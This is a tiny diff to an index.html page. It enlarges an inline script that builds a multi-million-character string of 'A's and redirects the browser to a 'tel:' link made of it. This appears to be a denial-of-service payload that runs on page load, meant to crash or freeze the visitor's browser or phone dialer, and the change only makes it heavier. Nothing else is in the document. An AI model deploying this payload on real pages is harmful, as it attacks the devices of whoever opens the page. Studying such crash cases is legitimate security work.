--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <script>
 var a="";
-for(var i=1;i<=400000;i++) 
+for(var i=1;i<=1600000;i++) 
 a="A"+a; 
 document.location.replace("tel:"+a+a+a+a);
 </script>
